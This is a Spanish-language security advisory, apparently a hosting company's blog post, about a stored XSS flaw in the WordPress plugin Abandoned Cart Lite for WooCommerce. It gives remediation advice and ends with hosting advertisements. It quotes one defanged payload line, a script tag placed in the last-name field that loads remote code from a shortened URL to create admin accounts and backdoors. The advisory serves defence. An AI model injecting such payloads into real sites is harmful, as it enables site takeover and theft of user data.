Plugin WordPress Hackeado – Abandoned Cart Lite for WooCommerce

Categorias: Wordpress

Plugin WordPress Hackeado - Abandoned Cart Lite for WooCommerce

Se ha detectado una vulnerabilidad importante en el plugin para WordPress Abandoned Cart Lite for WooCommerce.

Si estás usando este plugin, es imperativo que actualices a la versión 5.2.0 del plugin o superior y revises WordPress en busca de contenido malicioso.

De no hacerlo, un atacante podría hacerse con el control del sitio web y realizar la acción que desee hacer, envíos de spam, añadir código malicioso para substraer datos de los usuarios, software par minar criptomonedas, etc…

Cómo Funciona la Vulnerabilidad en Abandoned Cart Lite

El plugin Abandoned Cart Lite for WooCommerce es un plugin pensado para recuperar las ventas que se quedan a medias en WooCommerce.

Si un cliente deja un producto en el carrito de compra sin finalizar el proceso de pago, avisa al administrador de sitio para que intente recuperar la venta.

Este tipo de plugins son muy populares pues son muy efectivos para aumentar el número de ventas de cualquier comercio online.

Si estás acostumbrado a realizar compras por Internet y alguna vez has dejado un producto en el carrito de tu cuenta de Amazon o similar, seguramente habrás recibido algún email recordándote que tienes dicho producto en el carrito.

Los atacantes encontraron una vulnerabilidad en el plugin Abandoned Cart Lite for WooCommercepara poder atacar el sitio inyectado una carga maliciosa de JavaScript

Una vez descubierta la vulnerabilidad el proceso no es complicado.

Cómo Funciona la Vulnerabilidad en Abandoned Cart Lite

Los atacante simplemente tenían que realizar el proceso de compra y dejar el carrito abandonado.

Con nombre y correo electrónico falsos, no importa, pero en el campo de Apellidos (billing_last_name) añaden un carga útil con el script inyectado del tipo:

<script src=hXXps://bit[.]ly/xxxxxxx></script> 

Este script de destino es el encargado de ejecutar el contenido malicioso utilizando la propia sesión abierta por el administrador, que está revisando el carrito abandonado, para añadir las puertas traseras en el propio sitio web.

Se han detectados dos acciones maliciosas. Una es crear una cuenta de administrador no autorizada y la otra buscar un plugin que tengamos desactivado para instalar en él un script de ejecución de código.

Si el ataque tiene éxito, el mismo script se encarga de avisar al atacante para que puede empezar a realizar sus acciones maliciosas.

Como habrás visto, el ataque usa el popular acortador de URL’s bit.ly, lo que le garantiza cierto anonimato y seguir teniendo acceso al sitio editando el enlace acortado si el dominio atacante es desactivado. Sencillo pero efectivo.
 

Qué Hacer si uso el Plugin Abandoned Cart Lite

Si eres uno de los usuarios del plugin Abandoned Cart Lite lo primero que tienes que hacer es actualizarlo a la última versión que exista disponible.

Por desgracia, el parche añadido por el desarrollador del plugin no puede eliminar los usuarios creados, ni es capaz de cerrar las puertas traseras que el ataque haya podido crear.

Si crees que has podido ser objeto de un ataque deberás de revisar dos cosas:

1- Revisar la base de datos en busca de cualquier código inyectado. La principal tabla es: ‘’ac_guest_abandoned_cart_history

2- Revisar los usuarios con el roll de administrador de WordPress. Si hay alguno que no reconozcas, elimínalo sin contemplaciones.

Qué Hacer si uso el Plugin Abandoned Cart Lite

Después de esto puedes pasar pasar el antivirus que tienes disponible en cPanel, pero ten en cuenta que solo podrá detectar código malicioso instalado.

Si hay una puerta trasera, no la detectará, solo el código que se pueda inyectar a través de ella.

La vulnerabilidad usa el XSS de WordPress y la mayoría de los plugins de de seguridad de WordPress, bloquean los ataques XSS.

Así que si tenéis instalado algunos de estos plugins como Wordfence, BBQ:Block Bad Queries, BulletProof Security, etc… posiblemente haya podido evitar el ataque.

Si no tienes ningún plugin instalado prueba a instalar alguno y hacer un escanear WordPress, pero recuerda que la revisión de la base de datos y usuarios debes hacerla tú o dejarlo en manos de un profesional para estar totalmente seguros.

Hostinet y la Seguridad en WordPress

En todos los hosting WordPress que ofrecemos en Hostinet, tenemos un sistema de protección de Malware.

No podemos evitar que un ataque como el que hemos comentado hoy, acabe inyectando malware en tu WordPress, pero si podemos detectarlo y aislarlo.

Después avisamos al cliente para que pueda tomar las acciones pertinentes y solucionar el problema lo antes posible.

Así que si eres cliente de Hostinet, tienes esta capa de seguridad extra de la que nos encargamos nosotros.

  • WordPress 1Hosting especializado en WordPress con discos SSDdesde4´38€/mes
  • WordPress 2Hosting especializado en WordPress con discos SSDdesde5´54€/mes
  • WordPress 3Hosting especializado en WordPress con discos SSDdesde8´34€/mes
  • WordPress 1Hosting especializado en WordPress con discos SSDdesde4´38€/mes
  • WordPress 2Hosting especializado en WordPress con discos SSDdesde5´54€/mes
  • WordPress 3Hosting especializado en WordPress con discos SSDdesde8´34€/mes
    • Almacenamiento en disco duro ultra rápido SSDAlmacenamiento en disco duro ultra rápido SSDAlmacenamiento en disco duro ultra rápido SSDAlmacenamiento en disco duro ultra rápido SSD
    • El espacio en disco es la suma del espacio que ocupan los archivos que forman la web y el correo electrónico.
    • La transferencia de datos mensual es la cantidad total de información que se descargan los visitantes de nuestra web en cada acceso más nuestro uso a través de FTP y correo.
    • Ideado para sacar el máximo partido a tu WordPress
    • Tras evaluación de nuestro equipo de migraciones
    • Te ayudamos vía email y teléfono en todas tus consultas sobre hosting web
    • Elige la versión de PHP que necesites
    • Certificado SSL autofirmadoCertificados Let's Encrypt. Mas Información AQUICertificados Let's Encrypt. Mas Información AQUICertificados Let's Encrypt. Mas Información AQUI
    • Contrata tu hosting web y consigue dominios gratisUna vez dado de alta tu alojamiento web, recibirás los vales correspondientes para registrar nuevos dominios .ES, .COM, .INFO, .NET, .ORG ó .EU.
    • Migramos tu web de tu actual host a HostinetMigramos tu web de tu actual host a HostinetMigramos tu web de tu actual host a Hostinet
    • Ideado para sacar el máximo partido a tu WordPress
    • Te ayudamos vía email y teléfono en todas tus consultas sobre hosting web
    • Hosting específicamente preparado para sacar el máximo rendimiento a tu Wordpress
    • Contrata tu hosting web y consigue dominios gratisUna vez dado de alta tu alojamiento web, recibirás los vales correspondientes para registrar nuevos dominios .ES, .COM, .INFO, .NET, .ORG ó .EU.
    • Cada dominio alojado muestra un contenido único y diferente del resto
    • Aparcando un dominio secundario en el alojamiento de nuestro dominio principal conseguimos que ambos dominios resuelvan indistintamente con la misma página que tenemos colgada.
    • Cuentas de correo gestionables a través de POP, IMAP y servicio Webmail
    • Tus buzones de correo y mails limpios de virus y con un potente filtro antispam
    • Centro de datos en Madrid (España)
    • Opción de contratación de IP dedicadaPuedes contratar tu Ip dedicada por solo 11.95 € al año AQUIPuedes contratar tu Ip dedicada por solo 11.95 € al año AQUIPuedes contratar tu Ip dedicada por solo 11.95 € al año AQUI
    • Opción de contratación de certificados SSL. Se requiere Ip dedicada.Puedes contratar tu certificado SSL por solo 14.95 € al año AQUIPuedes contratar tu certificado SSL por solo 14.95 € al año AQUIPuedes contratar tu certificado SSL por solo 14.95 € al año AQUI
    • Bases de datos MySQL disponibles para su uso en cada alojamiento web
    • ¿Quieres realizar desarrollos con Python? En Hostinet innovamos dia a dia en tu beneficio y por ello te presentamos como última novedad en todos nuestros servidores Web la posibilidad de desplegar tus aplicaciones con Python directamente desde el cPanel de tu Hosting.
    • ¿Quieres desarrollar tus aplicaciones con Ruby? En Hostinet te presentamos como última novedad en todos nuestros servicios de Hosting Web la posibilidad de desplegar tus aplicaciones con Ruby on Rails directamente desde el panel de control cPanel.
    • El fichero .htaccess permite modificar diferentes variables en la configuración de nuestra cuenta de alojamiento en el servidor.
    • El módulo mod_rewrite permite crear direcciones URL alternativas a las dinámicas generadas por la programación de nuestros sitio web (blog, foro, portal…), de tal modo que sean más legibles y fáciles de recordar
    • Te ayudamos vía email y teléfono en todas tus consultas sobre hosting web. Soporte en español por personal de Hostinet.
    • Completa recopilación de tutoriales sobre Hosting, Dominios y Wordpress
    • 30 dias para probar tu servicio de Hosting y si no te convence el servicio... te devolvemos el dinero!!
VN:F [1.9.22_1171]
Rating: 0.0/5 (Votos: 0)

¿NECESITAS AYUDA? Llama a nuestro soporte técnico 946 545 762

De Lunes a Viernes de 08:00 a 20:00 horas.


Contactar